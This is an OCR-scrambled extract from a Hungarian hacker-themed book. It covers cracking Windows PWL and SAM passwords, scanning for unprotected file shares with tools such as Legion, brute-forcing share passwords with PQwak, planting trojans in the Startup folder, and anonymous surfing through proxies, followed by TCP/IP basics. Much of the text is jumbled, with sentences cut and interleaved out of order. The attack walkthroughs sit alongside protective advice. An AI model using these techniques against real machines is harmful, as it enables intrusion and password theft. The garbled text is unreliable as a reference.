aktuális példa: 2001. a fájlnév pedig a mindenkori felhasználó neve lesz. a Microsoft nagyon megkönnyíti a betolakodóknak. verziótól kezdve egy automatikus kiegészítést használ. 10:30 . A Windows minden PWL-fájlt a Windows könyvtárban tárol. tehát a c:\windows\ alatt. Egy kb. a PWL fájl nevejani. . Sajnos.2 A jelszófájlok A Windows 95/98/ME PWL fájlokban tárolja a jelszavakat és a felhasználói neveket. hogy szeretné-e menteni ezeket. hogy hozzáférjenek ezekhez az információkhoz.silicon. hogy valaki.internetet vagy a hálózatot. november 5. 2. a felhasználóknak pedig egyre nehezebbé teszi a jelszavak elrejtését. akik mit sem sejtő PC-tulajdonosok költségére szörföztek az interneten.

illetve kiolvasását. és az. illetve feltörését. A következő verziókban már olyan kódolási technikákat használtak. Ha Windows 2000 alatt bejelentkezik egy felhasználó. mindez azonban már sokkal több időbe telt. fájloknál azonban sok idő kell a jelszavak kiolvasásához.3 Jelszavak a Windows 2000 alatt A Windows 2000 alatt egészen más a jelszavak kezelése. mint a Windows 95/98/ME alatt. amely megakadályozza a jelszavak kiolvasását. amelynél mindkét kommunikációs partner ugyanazt teszi . A szimmetrikus kódolás előnye mindenekelőtt a kódolás nagy sebessége. microsoft. és szükség esetén figyelmezteti a felhasználót. a fogadó pedig ugyanezzel a kóddal fejti meg az üzenetet. az adatai a Security Account Manager-hez továbbítódnak. Ez a Windows jelszó mellett a hálózati jelszót is őrzi. amelyeket ugyan továbbra is számos segédprogrammal fel lehetett törni. hogy a jelszófeltörők elérjék a PWL fájlokat. és ezzel lehetetlenné teszi a kiolvasásukat is. amelyeket a winnt/ system32/config/sam fájl tárol. amelyek lehetővé teszik a Windows jelszavak kikódolását. ráadásul a trójaiakba is gyakran integrálnak olyan programokat. Ezt a fájlt nem lehet közvetlenül elérni. a Windows 95/98/ME alatt lehetőség van a HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion \Policies\Network \DisabledPwdCaching = 1 Registry-kulcs létrehozására. Hátrányként jelenik meg a kódkicserélés problémája és a ráfordításigényes kódnyilvántartás. Védelmi lehetőségek Hogy a jelszófeltörő programoktól megvédhessük magunkat. amelyek a tulajdonképpeni jelszavakat tartalmazzák. ehhez számtalan eszköz áll a hackerek rendelkezésére a hálón. hogy a jelszó hosszabb vagy rövidebb 32 bitnél. Egy PWL fájl tartalmaz egy header-t. A SAM azokat a felhasználói adatokat használja. s automatikusan figyelmeztet az általános jelszóbiztonság elleni vétségekre.2. Ezeknek az adatoknak az alapján a Windows 2000 ki tudja számítani a jelszavak biztonsági kockázatát. Továbbra is ajánlatos azonban. Ilyenkor a hackerek gyakran lemezre menük a PWL fájlokat. A Windows 2000 automatikusan ellenőrzi a jelszavak biztonságosságát. Mindegy. hogy az eljárást könnyű implementálni. mivel a Windows állandóan használja. Jelszófeltörők Mint már említettük. amelyek lehetővé teszik a célszámítógép valamennyi jelszavának azonnali kiolvasását. Ez a kulcs megakadályozza a megadott jelszavak tárolását. Az RC4 egy szimmetrikus kódolási eljárás. Ehhez az update-hez a http://support. amelyeket egy másik számítógépre másolhatnak. A PassSecure a Multimedia Network Systemstől meggátolja.A kódolás A Microsoft a Windows 95 első verzióiban nem nagyon strapálta magát a kódolás algoritmusával. amelyben rögzítve vannak a hozzáférési jogai. A Windows valamennyi jelszót egy SAM (Security Account Manager)adatbázisban tárol. s egyfajta „jogosultsági igazolványt" kap. Van egy program is. a jelszavak rendszeres változtatását és a karakterek sokszínűségét. főleg a Windows 95 felhasználóknak. ez az adatbázis a Registry része. továbbá úgynevezett rekordokat is tárol. a frissítés egy erősebb kódoló algoritmusra. 2. A feladó egy kulccsal kódolja az átvitelre szánt adatokat.com/support/kb/artícles/Q132/8/07. ami viszonylag egyszerűvé tette a hackereknek ezek megfejtését. és hogy melyik felhasználói csoporthoz tartozik. A Windows 2000 ellenőrzi minden jelszó hosszát. a Windowshoz sok jelszófeltörő van. hogy ott zavartalanul és időkorlát nélkül kikódolhassák. Sajnos ezt a kódot a megfelelő eszközzel másodpercek alatt fel lehet törni. Ezzel a kóddal és az RC4 algoritmus egy változatával kódolják az adatokat a PWL fájlokban. A felhasználói névből és a jelszóból a Windows 9x egy 32 bit hosszúságii kódot generál. valamint a fájl létrejöttének a dátumát. a kód mindig ilyen hosszú.csak ellenkező irányban.asp oldalon juthatunk hozzá. A nagyobb PWL A számokból és betűkből álló kombinációk a jelszófeltőrőket is megizzasztják .

amelyeknek a felhasználói minden meghajtót megosztottak. Az ilyen esetek természetesen durva gondatlanságról tanúskodnak. a megosztás a magánemberek számára is a biztonságot meghatározó témává vált. Az adathordo- E szolgáltatások felhasználói általában nincsenek tisztában azzal. hogy továbbra is használni tudja a régi PC-jét. amelyet a hackerek okoznak. amelyet nem veszünk észre 2. hogy kitalálja a jelszót. Az első módszer a dictionary cracking. szabvány konfigurációban. így például a rendszer különböző réseinek a szkennelését. hogy mennyire könnyelműen mozognak egyesek a hálón. LOphtCrack 2. vagy hogy időnként csatlakoztatni tudjon egy notebookot. amelynél gyakran használt jelszavak és karakterek listáját használja.1 A fájl. hogy milyen megosztásokat használ a felhasználó. ahol minden lehetséges szám és/vagy szókombinációt kipróbál.3.3 A távoli elérésű támadás . .Időközben azonban számos Brute Force program is íródott. valóban nehéz. A második a brute force cracking. vigyázat! Egyet világosan kell látni: egy távolból jövő támadás egy Windows 95/98/ME rendszer ellen. hogy milyen veszélyeknek teszik ki az adataikat az internethez kapcsolódással. hogy a háttérben egyfajta másolatot készít a SAM-fájlról. A kár.tolvajkulcs a Windows 2000 jelszavakhoz A LOphtCrack kétféleképpen tud jelszavakat feltörni.5 . Azonban a strandard konfigurációt gyakran meg kell változtatni. A könyvhöz végzett kutatások során valóban találtunk olyan rendszereket. zók minden védelem nélküli megosztása vagy a slamposan megadott jelszavak gyakran szélesre tárják a kaput a betolakodók előtt. (A jelszófeltörés témáját a 7.5. Ebből a fejezetből kiderül. Ez a program úgy kerüli ki a hozzáférési védelmet.internetvagy hálózati felhasználók. fejezet részletesen újratárgyalja. hogy lehetővé tegyék a felhasználóknak a mappák vagy az adathordozók elérését a hálózaton. amelyek az NT és a Windows 2000 alatt is lehetővé teszik jelszavak hackelését. ugyanakkor újra bebizonyítják. az xDSL és a flatrate-ek korában. amikor a felhasználók rendszerei gyakran folyamatosan kapcsolódnak az internethez. főleg attól függ. méghozzá minden jelszóvédelem nélkül.) Itt egy kockázati tényező rejtőzik. Mióta egyre több felhasználó épít ki otthon is kis hálózatocskát. 2.és nyomtatómegosztás veszélyes biztonsági rések A fájl. egyedüli PC-ként és trójai nélkül. elég idejük van a hackereknek arra. Az egyik legismertebb közülük a legendás LOphtCrack 2. Ráadásul az ISDN. hogy a cél érdekében számtalan támadási módot kipróbáljanak. például a rendszer hálózatra csatlakoztatása miatt. hogyan lehet felderíteni az ilyen megosztott erőforrásokat.és nyomtatómegosztást tulajdonképpen arra használják.

A megosztások felkutatásához elegendő a számítógép IP-területe Csak a számítógépről szállít információkat.2 Mik azok a szkennerek. a hálózaton keresztül elért számítógépen. Az egyik legismertebb ilyen a Légion. UNIX/Linux Windows 9x/NT. A szkennelés eredménye A DOS alatt a NET USE paranccsal is lehet kapcsolatot teremteni. és semmilyen támadóeszköze nincs.hackerzbook. Az előnyei a Légionnal szemben a nagy megbízhatóság és a nagyon gyors szkennelés.hackerzbook.2. a Légion nagyon megbízhatatlan. ami több szkennelést tesz szükségessé.3.de www. majd grafikusan megjeleníti ezeket. és hogyan működnek? A megosztások felkutatása szkennerprogramokkal történik. Név Auto NetBIOS Hacker Légion NAT SharesFinder URL www. Sajnos.de www.de Operációs rendszer Windows 9x/NT/2000 Windows 9x/NT/2000.de www.hackerzbook.hackerzbook. Kapcsolódás egy másik számítógéphez. UNIX/Linux Windows 9x/NT/2000 Programok a megosztások felkutatásához Hozzáférés a szabad erőforrásokhoz A talált megosztott erőforrások elérése a következők szerint történik: a támadó egyszerűen beírja a talált IP-címet a Windows Intézőbe. és nem mindig találja meg azonnal a megosztott erőforrásokat.3. A következő ábra a megosztott C: merevlemez tartalmát mutatja egy. fájlmegosztással Egy másik a Lan Guard Network Scanner. a Rhino9 szerzeménye.161. például a Légiont kell használni. A Légion minden megosztást szkennel a számítógépen.59. Nem nehéz felismerni a lehetséges kockázatokat és károkat. ami azt jelenti. . hogy a jelszófeltöréshez egy másik eszközt. például \\217.

hónapnevek vagy teszt. Ezzel megvalósíthatjuk. . ha kap egy hibajelzést.3. keresztneveket. pl. Annak megfelelően.4 Jelszóval védett megosztások A megosztott erőforrásokat természetesen jelszóval lehet védeni. Nehéz jelszavaknál ez természetesen meglehetősen értelmetlen vállalkozás. születési adatokat. amit egy hacker programok segítsége nélkül is megtenne. hogy milyen hozzáférési módokat adtak meg. gyakran hebehurgyán felhasznált jelszó közül. a fájl törlődjön. Ilyen lehet például egy program. a szisztematikus találgatás. hogy senki se férjen hozzájuk jogosulatlanul a hálózatról vagy az internetről. hogy mi mindent tudnak megváltoztatni. amit némi tudással vagy megfelelő programmal könnyen ki lehet kerülni.. Ezt a beavatkozást esetleg észreveszik. törölni. rendkívül hatékony is lehet. és a szerver elinduljon.5 Brute Porce-rohamok a megosztási jelszavak ellen A legjobb és legismertebb ilyen programok egyike a PQwak. Az is köztudott. De vannak gyakran használt szabvány jelszavak is.. barátnő. boss. jelszó. és több sikerrel kecsegtető módszerek után néz. amely Brute Force-rohamot intéz a NetBIOS jelszó ellen. a betolakodó másolhat. hogy végiggondolja a felhasználó minden ismert személyes adatát. kutya nevét. ahol megvan a lehetősége. Egy különösen kedvelt támadási mód egy trójai vírust elhelyezni a C:\WINDOWS\STARTMENÜ\PROGRAMOK\INDÍTÓPULT könyvtárban. Az első. és ezeket jelszóként végigpróbálgatja.3. vezetékneveket.3 Milyen lehetőségeik vannak a betolakodóknak? A megosztott mappát vagy meghajtófájlokat a megosztás módja szerint lehet elérni. Kezdhetné azzal. vagy a kedve szerint törölhet. hogy csak néhányat említsünk a számtalan. Egy példa arra. hogy a trójai szerver része (közelebbit lásd a trójaiakról szóló fejezetben) a következő bootolás után telepítődjön. mint például gast. A legegyszerűbb védelem: jelszavak az erőforrásokhoz 2. Shane Hird műhelyéből Ez az eszköz többek között a Windows 95/98 alatti fájlmegosztás egy implementációs hibáját használja ki. amit valamikor a potenciális hacker is fel fog adni. Ezzel elérhető. vagy manipulálni a behatolók Persze ez a védelem a szimpla jelszavak esetén meglehetősen sovány. de hogy a felhasználó egy trójai becsempészésére fog-e gyanakodni. admin. hogy a felhasználók kényelemszeretetből gyakran könnyen megjegyezhető jelszavakat adnak meg. 2.Így lehet DOS alól elérni a másik számítógépet 2. hogy a felhasználót személyesen is ismeri.3. az bizony kérdéses. feltölthet. ami a helyi hálózaton. ahogy neki tetszik. administrator.

hogy a bonyolult támadásokkal ellentétben. hogy teljesen az uralmuk alá hajtsanak rendszereket. sok különleges karakter hiányzik. amelyek védik az erőforrásokat.4 További támadási technikák A bemutatott biztonsági réseken kívül.és nyomtatómegosztás megszüntetése a hálózati környezet beállításainál. A PQwak minden karaktert és különleges karaktert felismer. hogy jelszavakat kémleljenek ki. így azután a legrövidebb idő alatt szinte minden jelszót fel lehet vele törni.betörés a hátsó ajtón keresztül Nagyon elterjedtek a támadások a hátsó ajtók. ami azt jelenti. ha védekezni akarunk az ilyen támadások ellen: a fájl. A trójaiak a felépítésüknél fogva kitűnően alkalmasak arra. és egyre gyakrabban figyelnek oda arra. Az ilyen programok felhasználói ritkán gondolkodnak el cselekedetük következményeiről. Ez különösen a „szabadidős hackereknek" nyújt lehetőséget arra. de jelentősen megnehezíti a betörést. Mind gyakrabban használnak tűzfalakat. és megosztásokat hozzanak létre. természetesen vannak még más támadási lehetőségek is. manipulálják a Registry-t. A PQwak l . hogy ne nyissák meg gondatlanul a mail-ékhez csatolt fájlokat. amelyek külön fejezetet kaptak a könyvben (lásd 4. adatokat másoljanak. Egyre jobban elterjednek a trójai-. Ezeknek a programoknak a problematikája az egyszerűségükben rejlik. A felhasználók magatartása különösen a médiák felvilágosító tevékenysége nyomán az utóbbi években erősen megváltozott. Továbbá minden szükségtelen protokollt. és amelyekre most csak röviden szeretnénk kitérni. Ez ugyan nem kínál százszázalékos védelmet. Aránylag kényelmetlen. Szerverkörnyezetekben a rendszeradminisztrátor beállíthatja a jelszavak erősségét és futási idejét. de veszélytelen . mivel rá vannak utalva a megosztott erőforrások használatára. 2. fejezet). annak gyakran kell újraindítania. köztük a NetBIOS-t is távolítsuk el. Tulajdonképpen csak erős jelszavak jöhetnek számításba. hogy egy bizonyos idő múlva a még oly türelmes hacker is feladja. eljárásokat indítsanak vagy fejezzenek be. amelyek megakadályozzák a trójai szerver kapcsolódását a klienshez. és aki sikert akar elérni. és kiindulhatunk abból. A PQwaknak egyszerűen meg kell adni annak a számítógépnek az IP-jét. amelyeket most csak bemutatunk. illetve a Remote Controll programok. amelynek a jelszavait fel kell törnie. amelyek az operációs rendszer felépítésében gyökereznek. 2.megszüntetjük a megosztásokat Trójaiak . és ennek megfelelő agresszivitással támadnak áldozataik rendszereire. amit tehetünk.3.6 Óvintézkedések A legegyszerűbb. Itt újból bizonyítást nyer az alfanumerikus kombinációk erőssége.Előkészület a célzott támadásra Ez a megoldás azonban sok felhasználó számára szóba sem jöhet. illetve töröljenek. illetve víruskere- .0-s verziója nincs túl gondosan programozva. itt semmiféle háttértudás megszerzésével nem kell foglalkozni. ismertebb nevükön a trójaiak segítségével.

A védekezés és a felismerés lehetőségeivel ugyancsak a trójaiakról szóló fejezetben foglalkozunk. amelyek képesek észlelni és eltávolítani a szerveralkalmazásokat a rendszerben. . de a rendszergazdák valószínűleg csak a káresetekből fognak tanulni. amelyek vállalati hálózatokban működtek. mint a Sub7 vagy a BackOrifice (pontosabbat ezekről a programokról a trójaiakról szóló fejezetben) települtek olyan számítógépekre. és fütyülve minden figyelmeztetésre. A gyakorlatból ismerünk olyan eseteket. akikben nem tudatosultak ezek a veszélyek. mikor már régóta ismert trójaiak. Ez a magatartás durván felelőtlen.ső programok is. ismeretlen és komolytalan forrásból származó fájlokat nyitnak meg. illetve megfelelő figyelmeztetésekkel megakadályozni a telepítésüket. De még mindig elég sok felhasználó van.

............2.2 Az FTP 3.... A TCP/IP 3..4 Az IP-címzés 3.........1 Mi a TCP/IP? 3..3.3...1 A legtöbb felhasználó sokat elárul3..3.2 Különböző protokollok a rétegekben 3.Tartalom 3...3 Néhány alkalmazás és protokoll használata és a biztonságosságuk ....3...1 A Telnet 3..........3.4 A portokról .1 Az anonim internetezés csökkenti a kockázatot ...3.........1.1.....2 .2. 3.. Az IRC 3.... 3... Névtelenül 3...2. fejezet .....

szörfözés célja. az időpontot. Ennek a fejezetnek az első része azt is milyen információkat kaphatnak rólunk mások. a felkeresett oldal URL-jét. min csak ebből semmit nem lehet észrevenni. Aki csak általában akar a hackerek tevékenységéről tájékozt a fejezetet természetesen nem kell elolvasnia. és a nézőnek egyáltalán nem tűnik fel. nagyon pontos címzés. Ez den bemutatja a legfontosabb információkat. hogy megakadályozzuk saját IP-címünk átadását jobb megértés kedvéért képzeljük el egyszer az IP-címet a követggésben: egy potencionális betörőnek . amelyek alapján hackerek figyelhetnek fel ránk. GIF-ekről. . arról természetesen szintén itt olvas 3.ok don szörfözünk a neten. Csak ezután á. amit az anonim szörfözésnél el kell titk tuális IP-cím. Mindenhol h nyomokat. Így némi erhető a technikákba is. a m IRC. Ezzel akkor kell foglalkozdünk a háló kémlelésének. Így viszont sok emenően érthetetlen marad. de amint ez ismertté válik. és esetleg károkat nekünk. Mindkettő hasonlít a talán már ismert cookie-khoz.net/anonymizer oldal teszi világossá.mert egy hacker nem jeC-nk szempontjából . amint az a lenti példából is lá könnyen követni lehet az IP-címek segítségével.hiszen a névjegym osztogatjuk mindenütt. Ha egy o tartalmaz ilyen „bogárkát". amelyet minden számítógép az internetre lépéskor k Az interneten megtett utat. A kis web-bugokról van szó. akkor ID-vel együtt lehet tárolni.tudnia kell a pontos címet. amely valahol a webo tegrálva. és ez gük lesz pontosan kideríteni az identitásunkat. és gyakorlatilag úgy működik.1. amikor a web-bugot megnézték. személyes adatokat adunk meg. Az IP-cim minden alkalommal átmegy az adatokkal együtt. egy emelettel és lakásszámmal együtt tacímhez hasonlít. suk a legfontosabbakat a névtelen szörfözésről .1 A legtöbb felhasználó sokat elárul e többet megtudni a hackerek tevékenységéről. ICQ vendégkönyvekben és a nyílt fórumokon. mivel egészen k átadja egy szervernek az IP-címet. E mmi sem történhet. a ek URL-jét. illetve a házunk gyenge pontjait. A parányi GIF-képecske (egy pixel méretű). ha „normál" mó- Egy szituáció. annak az internet alapjaival is közelebbi ismeretségbe Különben bizonyos támadási lehetőségek aligha követhetőek. amelyek lehetővé tesznek bizonyos tákat. anonim internetezés csökkenti a ckázatot et az anonim szörfözésnek szenteltük. Hogy ezeknek a részleteknek a nyilvános hogyan akadályozhatjuk meg.a PC-nk nyitott portjához hasonlóan . A „normál" és az anonim szörfözés közötti kü http://privacy. Csak ennek az adatnak az ismeretében válik a aablak . hogy kiderítse a lakásunk. amelyben öntudatlanul is feladjuk az anonimit valószínűleg a legkevésbé tűnt fel. és kikapcsolni sem lehet Tehát a legfontosabb. a b valamint egy korábban elhelyezett cookie információit. amelyek a „hacker és egyben a védekezés alapismeretei közé is tartoznak.kockázattá. stratégiáiról és őségeiről. igen jó rálátás kíetkörülményeinkre és a szokásainkra.

12-t egy Intel PC-n.2 Névtelenül A cél tehát az. a ho „hiszi" (az IP alapján). például Mozilla/4. mint minden más. 3. például a http://anonsurf. Az ilyen oldalak működési módja: az proxy-szerver többé-kevésbé szűri. Íme. gésző az e-mail-címeket és/vagy a login neveket is továbbítja. hogy védekezzünk. az Anon használata.cgi.de természetesen újból olvasni. és nem a din IP-t mutatják. vagy talmakon keresztül. 2.de vagy a klassziku anonymizer. hogy titkosítsuk a saját IP-címünket. Ha ezt az oldalt most egy anonymizeren keresztül keressük fel. fent nevezett információt.2. ha minden protokoll Az aktuális proxy-szerverekről és csatlakozásaikról a cyberarmy. csak a szerver címét és a por gésző Internet-beállításainál (legjobb.junkbister. itt például Linux 2. hogy mégiscsak m valamennyire az anonimitást az internetes szörfözéskor. Egy másik egyszerű módszer egy anonim proxy-szerveren figurálni a saját böngészőnk kapcsolatát. egy mási milyet se mutassunk. hogy: „Megint itt vagyok!") az interneten. ben a böngésző ismeri ezeket (az e-mail-címet a böngésző jelszó tadhatja egy anonim FTP-szerverhez való hozzáféréshez. tehát a szolg újabb betárcsázáskor egy új. és a hostnak a proxy IP-t. Mostanában a Junkb jött divatba (közelebbi információk a www. hardverként vagy szoftverként. Tehát a proxy képviseli a számítógépünket.Információk az Anonymizernél Úgy az IP. másik IP-t oszt ki . hogy a következő adatok mindegyike. Ebből a rövidítésből g az is kiderül.2. Vanna keresőgépek is és hasonlók. mert egyéni igények szer ható. Magunk is beszerezhetünk egy proxy-programot vagy egy ul a http://proxys4all. ahogy az előbb már említettük. Hogy mo konfiguráljuk a böngészőnket. a kliens és a hos vannak kapcsolva. csak annak a weboldalak az információi kerülnek ki. amelyet a számítógép egy oldalhoz választott.12 i686) a Netscape-hez (angol verzió). és lehetőség szerint minden egyéb adatunka Egy előzetes megjegyzés: a saját IP-címünk egy internet-sz resztül történő szörfözéskor rendszerint dinamikus. mint a teljes útvonal is felismerhető.net címről.com.7 [en] (X11. amelyről erre az oldalra mentünk. és az ott tartózkodás ideje. hogy milyen operációs rendszer melyik verzióját uk. Így például le tudja nyomni a weboldalakon található .1. Az IP-cím és az útvonal mellett előfordulhat. hogy csak (!) a proxy-szerverrel van ben. A kliens tehát össze van kötve a hosttal. (ezek egy táblát akasztanak ránk. idítés a használt webböngészőhöz. Azon tőség is van arra. néhány ezek közül: ez tartozó domain név. azt mindjárt kiderül. l URL-je. amelyről az oldal linkjére kattintottunk (HTTP- s A legegyszerűbb. mint a JavaScript és hasonlók).com/lists/proxy/ címen találunk listát. vagy legalábbis néhány közülük hatóvá válik idegenek számára: Talán már a fentiekből is világossá válhat. Hogy hetséges.co kezdőknek kicsit nehezebb ennek a szoftvernek a telepíté szont kedvezőbbek a lehetőségek. Ehhez egy kis m proxyk.

ő eszköz. Az eg tő veszély itt is az. Ez a technológia először Internet Explorer 4. amelyről az oldalra kattintottak. az animált képeket és a pop-up menüket. Minden Mix gyűjti a bejövő üzeneteket. hanem minden elérésnél újból felismerhet érdeklődési köre a kiválasztott channel(ek) alapján meghat Active Channel technológia a már említett cookie-k szemé használja. A cachen különböző kritériumok szerint közlekedhetünk. hogy milyen fajta webdoku milyen HTML-kódba integrált scriptek megengedettek. amelyeket a következő online kapcso- • Egy további kis anonimitási rés csak az Internet Explorer felhasz nyes: ezek az Active Channelek. megadhatunk egy URL-listát. A JavaScript utólag mégis áthúzhatja a kat. Pontosan megadhatjuk. azé az URL-é. az egész rendszer megbízható. A cache-tartalmon belüli k egészítésképpen saját keresőgépet is lehet telepíteni. a program lehet érdekes. ezért ennek a leírásáról itt lemon akiknek egy kicsit több idejük van és Linux-pártiak. feljegyzi egy listára. a Webwasher. kilistáztatául az összes. Tehát: ha nincs rá feltétlenül szükségünk. Hogy meghat mációkhoz juthassunk. azonban más háló sokra is átvihető.webwasher. user agentként. és így sem lehet. a valóban a sző által elküldött sztringeket küldi el. Még ha valóban anonim proxykat is használunk. A kommunikáció a Mixen belül kódolt. A koncepciót um eredetileg e-mail küldéshez fejlesztette. n nem működik hibátlanul.vagy a JavaScriptWWWoffle-t FTP-proxyként is lehet használni. vagy kiköthe volítsa el a HTML-kódból a Java. latnál fog betölteni és hasonlókat. hogy a Webwashert használja. Alapértelmezésként ez st kap. és lehetővé teszi. er Windows 95/98/NT/2000-hez és a Macintosh-hoz is meg ősorban arra szolgál. inkább kapcso • Ha egy hacker valami nagyobbat tervez. vagyis a anonim marad. Így nem lehet összefüg teni a bejövő és a kimenő üzenetek között. hogy nagy hálózati terheltséget Mixek még nem állnak nyilvánosan rendelkezésre. hogy milyen felhasználói névvel jelentkezzen be FTP-szerverre.de címen. csak egyes teket lehet találni. amel vagy az internetre kapcsolódás indításakor betöltődik (tehát b vagy állandó kapcsolat esetén a számítógép indításakor). Az Active Channelekkel ki egyet egy webszerver-üzemeltető ajánlatából (kezdőlap). amely az anonimitásról gondoskodhat. hogy mi kerüljön a cache-be. ezt azonban lekapcsol Webwasher magáncélra ingyenes. szét és egy bizonyos idő után továbbküldi. Az oldalakat. Termés konfigurálható. hogy hálózati kapcsolat ssen navigálni ebben a cache-ben. és nem kell ezt a véletlenre vagy a webböngé tett alapértelmezésre bízni. A mi szempontunkból azonban inkább onságai érdekesek: a Webwasherrel megakadályozható a erer küldése. hogy kiszűrje a weboldalakról a nereket. Ha csak egyeden gbízhatóan működik. hogy a csatorna előfizetője már nem anoni tokat egy szerverről. mert megakadályozza az olvasó „zavará mtalan reklámbannerrel. amiről sen megfeledkeznek. Sajnos a JavaScript funkciókat minden böngészőnél lehet célzottan inaktiválni. Mindez a ra védelmét szolgálja. • A proxy-knál még egy fontos szempontra kell ügyelni. vagy a legutóbbi kapcsolódás során meglátoga esetleg minden oldalt. E letilthatjuk a frame-ek vagy a képek letöltését. amelyet minden esetben ki kell y át kell engedni. a böngészőben általában külső URLtintani vagy be kell gépelni ezeket. és megtalálható a w. A mi szempontunkból a WWWoffle főleg azért lehet a Junkbusterhez hasonlóan. Létezik ugyan egy verziója Windows 95-höz is. akkor beszerez mag shell-accountot. A Mix hátránya. és ezek után minden jogosultságot tesztel Sok szolgáltató kínál ingyenes shell-account-okat (ezek azonb . A Webwasher. majd az emre váltáskor kérésre automatikusan betölti. itt is célzottan lehet definiá headert.i eszköz a jelenleg csak kevesek számára elérhető Mix-System. beleértve az online és az offline módok tást is. állomásból áll. A WWWoffle Unix/Linux rendszerek s NT alatt fut. ilyenkor po adhatjuk. amelyekre rá de még nincsenek a cache-ben. A programot szőből lehet kezelni.0-s verzióban jelent meg. Ez a proxy elsősorban cache-elő verként működik. s ezekről üzeneteket küldenek. egy w ködtetője egy JavaScripten keresztül továbbra is le tudja kér címeket.

, vagy vannak hackeroldalak, amelyeken frissen feltört accountin-ek vannak, amelyeket használni lehet.

ackerek többnyire olyan rendszereket használnak platformként dszerek megtámadásához, amelyeket már a hatalmukban tartanak, mális (legális) szörfözéshez az említett lehetőségek is teljesen ele-

Hogyan működnek a protokollok? A két protokoll, a protokollok egymásra rétegződésén, „hal stack) keresztül működik. A protocol stack az az út, amelyet az a kell tenniük ahhoz, hogy az egyik számítógépből a másikba jussa amelynek a rétegei közül a TCP/IP csak kettőt, nevezetesen a 3 használja, a következőképppen van felosztva:
Réteg Alkalmazási réteg Megjelenítő réteg Leírás

n valaki, a fenti tanácsokat megfogadva, elrejtette az IP-címét, rogram csak a proxy-szerverről gyűjthet „személyre szabott" inmivel nekünk, felhasználóknak, nem sokat árthat.

Az alkalmazási réteg képezi a csatolófelületet az alk A megjelenítő rétegben a másik számítógép rendsz

között, amelyekkel a felhasználó parancsokat küld illetve fogad egy hálózato felhasználás-specifikus formattálások történnek. Session réteg

Ez

CP/IP

gondoskodik arról, hogy az alkalmazások között megszakadt kapcsolatok helyen is folytatódjanak. Transzport réteg Ez a réteg gondoskodik a

felálljanak és - az adatvesztés megakadályozása miatt - részben ugyan

akaszban néhány protokollt szeretnénk megismertetni, amelyeket álnak. A legfontosabbak közé tartozik a Transmission Control és az Internet Protocol (IP). vetkező részben a protokolloknak azok a funkciói szerepelnek, lözhetetlenek a későbbi célokhoz, így ennek a könyvnek a hasztt közölt tudás tökéletesen elegendő. Sajnos a téma olyan kompes kifejtése messze meghaladná e könyvnek a kereteit.

adatátvitelről a két számítógép között, és gyakran csatolófelületként is szolgá alkalmazási rétegek és az alá rendelt hálózati rétegek között. Hálózati/

Ebben a rétegben folyik az optimális út (routing) keresése az kapcsolati ré (pl.: IP). Adatbiztonsági réteg réteg

adatátvitelhez. A protokollt itt már a fölé rendelt rétegektől függetlenül ki leh

Ez a réteg arról gondoskodik, hogy lehetőle

hibás átvitelek, és ha mégis lennének, akkor az adatok helyre legyenek állít illetve küldésekor.

Ez a réteg felelős a fizikai kapcsolat létrehozásáért az adato

a TCP/IP?

két hálózati protokoll neve, amelyeket az interneten és a modern használnak: az IP azonban csak két protokoll-fajta a TCP/IP protokoll-csa-

sion Control Protocol (TCP) és Internet Protocol (IP).
A TCP IP-protokollhalom rétegei az OSI-modell szerint

rotokoll-család a háló minden szolgáltatását elvégzi, ide tartozik ldése, az adatok átvitele, hozzáférés a World Wide Webhez és az tása a usenet-en keresztül.

Az adatok a számítógépből kifelé tartva az ábrázolt sorrendb resztül ezeken a rétegeken, és fordított sorrendben mennek bef szerbe. Minden réteg tud adatokat küldeni a szomszédos rét adatokat fogadni attól. Valamennyi réteg protokollokkal van öss lyek különböző szolgáltatásokat nyújtanak.

önböző protokollok a rétegekben

Parancs Chown

Leírás Egy egyszerű szövegszerkesztő.

lán valamivel érthetőbb, hogyan történik a protokollhalmon keok küldése, illetve fogadása. Most megnézzük egy kicsit közeböző rétegek legfontosabb protokolljait.

Megváltoztatja a tulajdonost és a csoportot, amelyhez eg

és/vagy egy fájl tartozik. joe

A legfontosabb Telnet-parancsok

si réteg FTP

g, amelyben a felhasználó közvetlenül egy alkalmazásba írhatja t, hogy kapcsolatot nyisson egy számítógéppel, vagy megfelelő jon ki. Fordított értelemben tehát az alkalmazási réteg az a réteg gy alkalmazás az A számítógépen a B számítógéptől is megkapait. Ebben a rétegben egész sereg protokoll van, és ezeket felülárolja semmi. Bizonyos alkalmazások itt más alkalmazásokra is en például a HP egy SNMP-re épülő programja, az OpenView. nézzük ennek a rétegnek az alkalmazásait!

A Fik Transfer Protocol egy szolgáltatás, amely minden operá belül lehetővé teszi az adatok átvitelét és azoknak a mindenkori ban mentését. Mint tudjuk, a legtöbb operációs rendszer különb tumokat használ. A Unix és a Unix-klónok gyakran NFS-t System) használnak, az OS/2 általában HPFS-t (High Performance DOS/Windows pedig kizárólag FAT-et (File Allocation Table) v Windows 2000 és az XP ezenkívül még az NTFS-t is segítség FTP-n keresztüli kommunikáció, akárcsak a Telnet, a kliens-sz épül, de valamivel komplexebb. Ebbe nem akarunk részletesebb azonban a következő pontokat megemlítjük: A kommunikáció öt fázisra osztható:
Fázis 1. fázis: Leírás

k elején még nem voltak igazi hálózatok. Voltak viszont nagygée terminálokat csatlakoztattak. Egy terminál akkoriban csak káztül tudott adatot cserélni a nagygéppel, a további terminálokkal án nem kommunikálhatott. Hogy egy újabb kábelrengeteg létesí, szoftveres megoldásra volt szükség. Így jött létre a Telnet, amely a felhasználóknak, hogy úgy tudjanak adatokat szerkeszteni stb., ülnének a másik gép shell-je (DOS promptja) előtt. A felhasznázvetlenül az alkalmazásnak kiadott paranccsal nyitott meg egy legfontosabb Telnet-parancsokat az alábbi táblázat tartalmazza.
Az aktuálisan

A kliens kérdést küld a számítógépnek, hogy a szolgáltatás

Kapcsolatfelépítés zésre áll-e, az pedig megerősítést küld, hitelesíti a felhas jelszót, és átküldi az átviteli opciókat és a fájlnev(ek)et. 2. fázis: portra vonatkozó információkat, és előkészítik a tulajdon-Adatátviteli kapadatátvitelt. Miután ezt rögzítették, elkezdődhet a tulajdon-csolat létesítése adatátvitel. 3. fázis: formában, aho-Adatátvitel gyan azt már leírtuk. 4. fázis:

Ki

Az adatátvitel az FTP-n keresztül történik, a

Leírás Létrehozza a New nevű Megváltoztatja

